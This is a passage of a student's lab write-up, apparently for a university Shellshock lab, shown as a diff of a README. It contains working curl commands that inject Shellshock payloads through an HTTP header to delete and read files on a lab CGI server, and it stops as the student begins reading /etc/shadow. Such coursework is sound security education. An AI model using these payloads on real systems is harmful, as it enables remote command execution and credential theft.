LinShi11/csci-476-594-spring2021-private/lab02/README.md

 [02/16/21]seed@VM:~/.../image_www$ curl -H  temp:'() { :; }; echo; /bin/rm /tmp/test' http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi
 [02/16/21]seed@VM:~/.../image_www$ curl -H  temp:'() { :; }; echo; /bin/cat /tmp/test' http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi
 ```
 1. For this one, the syntax, or the order of placement is very similar to /bin/cat.
 I took sometime to look for the location of rm, which is in /bin as well.
-The rest are the same. curl -option (declaration if -H:)'declare the function; echo; <file of the command> <file of data> ' server
+The rest are the same. curl -option (declaration if -H:)'declare the function; echo; file_of_the_command file_of_data ' server
 2. For this one, I tested all three again.
 And all of them worked.
 Please note that I've skipped the lines that I used to add the string back.
 3. My attack was successful.
-Overall, this one came with zero surprise, I kind of did this portion when I was testing for my create a file.
+Overall, this one came with zero surprise, I kind of did this portion when I was testing for my Task 3.3.
 Additionally, the syntax is almost identical to /bin/cat.

 #### Task 3.5:
 I am trying to get the information from /etc/shadow: